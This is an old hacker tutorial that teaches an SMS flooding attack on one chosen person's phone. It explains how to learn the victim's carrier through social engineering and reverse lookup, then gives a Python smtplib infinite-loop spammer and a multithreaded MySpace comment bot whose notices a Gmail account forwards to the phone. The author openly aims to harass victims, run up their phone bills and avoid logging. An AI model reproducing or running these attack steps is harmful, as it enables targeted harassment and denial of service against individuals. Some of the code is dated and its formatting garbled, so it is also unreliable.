An Introduction To SMS Warfare

An Introduction to SMS Warfare

by James Penguin
The purpose of the following article is to take you through the process of carrying out a *controlled* SMS flood against a single target. I will cover how to identify your target’s service provider, and two separate methods of attack. If you are unfamiliar with the concept of SMS flooding, I would suggest you read, “Creating and Utilizing an SMS Flooder” by Halla which can be found here on InformationLeak.

[ A Brief Review ]
Before we begin, a brief explanation of how this works. Every cell phone that supports SMS has its own email address, the format of that address is:

1+(Area Code)+(Phone Number) @(Service Provider’s SMS Gateway)

So the address for the phone number (555) 867-5309 where T-Mobile is the service provider would be, 15558675309@tmomail.net By sending an email to this address, the phone it is associated with will receive a text message. And therein lies the potential for abuse.
NOTE: If the message sent is larger than the maximum size of a text message (Typically 160 characters) the message will be received as a picture message instead.
NOTE2: Depending on the service provider of your target, prefixing the address with a 1 may not work. Some providers, such as T-Mobile use it; and some providers, such as Verizon do not.

[ Identifying the Service Provider ]
The obvious first step in an SMS flood is identifying your target’s service provider. There are 2 methods of doing this, the first of which is just good ol’ fashioned social engineering. If you know your target personally, sending them a message along the lines of, “Agh my cell bill is ridiculous I hate who do you use?” will usually yield the desired info. However there are a few flaws with that strategy. First off it relies heavily on chance, it could give you away later on as the attacker, and finally it just isn’t stealthy. Luckily for us the White Pages’ reverse phone number lookup system lists not only the type of line for the number you search, but also the provider. So head on over to http://www.whitepages.com/reverse_phone plug in your target’s phone number, and whammo you now know their service provider. But just knowing your target’s service provider isn’t enough, you’ll also need to identify the SMS gateway for their particular service provider. A big list of service providers and their associated SMS gateway can be found at, http://net127.com/notes/index.php?title … teway_List … teway_List So for example, the SMS gateway for T-Mobile USA would be tmomail.net Which would mean that if your target’s phone number is (555) 867-5309, then their phone’s email address would be 15558675309@tmomail.net And with that, you are now ready to begin your attack!

[ Method One: Direct Interface with a SMTP Server ]
Now the simplest method of course would be to telnet into a SMTP server and then send your messages. However telnetting in by hand and sending the messages one by one isn’t very efficient. That’s where a little Python magic comes into play, everything you’ll need to execute the flood can be done using the Python interpreter. So if you don’t already have it, go download and install Python from http://python.org and fire up the interpreter. Now use the following example as a guide for your own flood.

Python 2.4.3 (#1, Jul 26 2006, 20:13:39)
[GCC 3.4.6] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import smtplib
>>> smtp_server = “smtp.server.whatever”
>>> from_address = “god@heaven.org” # this can be whatever you like
>>> to_address = “1558675309@tmomail.net” # the target phone’s email address
>>> message = “:)” # Gonna send that girl a smiley face, girls love smiley faces
>>> s = smtplib.SMTP()
>>> s.connect(smtp_server)
>>> while True: # creates an infinite loop
… s.sendmail(from_address,to_address,message)
… print “Message sent!”

Message sent!
Message sent!

It’s that simple! Unfortunately, there are a couple problems with this method of attack. First of course is that you’ll only be able to get off about 50 messages before you’re banned from the server for spamming, and second is that you have to directly connect to the server and thus are being logged. While you could use a proxy, there’s an easier, and trickier method that requires no proxies and is just as effective.

[ Method Two: Forwarding Gmail With a MySpace Twist ]
First off, register an account with Gmail, and then create a MySpace account using your newly created Gmail account as the email address. Next go to the account settings for your new MySpace profile, and enable the following:

– Do not send me MySpace newsletters
– Under Privacy Settings:
– Friend Requests – Require email or last name
– Blog Comments – Friends Only
– And everything for the Group Invite and Event Invite privacy settings
– Under IM Privacy Settings:
– Select the radio button next to “No one can IM me.”
– And everything for Block IM Invites From settings

The goal of all these settings is to make it so that the only email you actually receive from MySpace are alerts for when you receive a profile comment. The next step is to use another MySpace account to become friends with the one you’ve just created.

Finally, setup your Gmail account to forward email it receives to your target phone’s email address. This is done by going to Settings > Forwarding and POP, and then selecting the radio button next to where it says “Forward a copy of incoming mail to” Obviously now you enter the target phone’s email address, and it doesn’t really matter whether or not you keep a copy in the Gmail inbox. Lastly click, “Save Changes” and you’re done.

With all these configurations complete you should now have a MySpace profile, that for every comment it receives will send a picture message (remember how I mentioned messages exceeding 160 characters are received as a picture message?) to your target’s phone. Thus creating a SMS flood is accomplished by spamming your newly created profile with comments. And wouldn’t you know it, I’ve already got a Python script to do just that! (Oh and it’s multi threaded to boot!)

Line number On/Off | Expand/Contract
  1. #!/usr/bin/env python
  2. import urllib2, ClientForm, threading, sys
  3. email = “” # Email address of account to post comments
  4. password = “” # Password of account to post comments
  5. friendID = “” # Friend ID of recipient of comments
  6. message = “” # Message to leave in comments
  7. thread_limit = 40 # Number of bots to run in parallel
  8. class postComment(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): print “Posting comment %d!” % counter
  9. req = urllib2.Request(“http://comment.myspace.com/index.cfm?fuseaction=user.viewProfile_commentForm&friendID=%s” % friendID)
  10. res = opener.open(req)
  11. forms = ClientForm.ParseResponse(res)
  12. form = forms[1]
  13. form[“ctl00$cpMain$postComment$commentTextBox”] = message
  14. res = opener.open(form.click())
  15. forms = ClientForm.ParseResponse(res)
  16. form = forms[1]
  17. opener.open(form.click())
  18. # login
  19. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
  20. opener.addheaders = [(‘User-agent’, ‘Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)’)]
  21. urllib2.install_opener(opener)
  22. req = urllib2.Request(“http://login.myspace.com/index.cfm?fuseaction=login.process”)
  23. res = opener.open(req)
  24. forms = ClientForm.ParseResponse(res)
  25. form = forms[1]
  26. form[“email”] = email
  27. form[“password”] = password
  28. opener.open(form.click())
  29. # post comment
  30. counter = 0
  31. while 1:
  32. try:
  33. if threading.activeCount() < thread_limit:
  34. print counter
  35. postComment().start()
  36. counter+=1
  37. sys.stdout.write(“\r%d Comments Posted.” % counter)
  38. sys.stdout.flush()
  39. except KeyboardInterrupt: break

In order to run the script above, you’ll need to download the ClientForm module, found athttp://www.clientform.com. Just extract ClientForm.py into the same directory as the script above. Now to to begin your attack, modify the necessary variables in commenter.py and then execute it.

[ Close ]
There you have it, two sure fire ways to piss off and rack up the phone bill of anyone you want. Just don’t go getting yourselves arrested. With that I bid you good day, and may the fortunes of war smile upon you.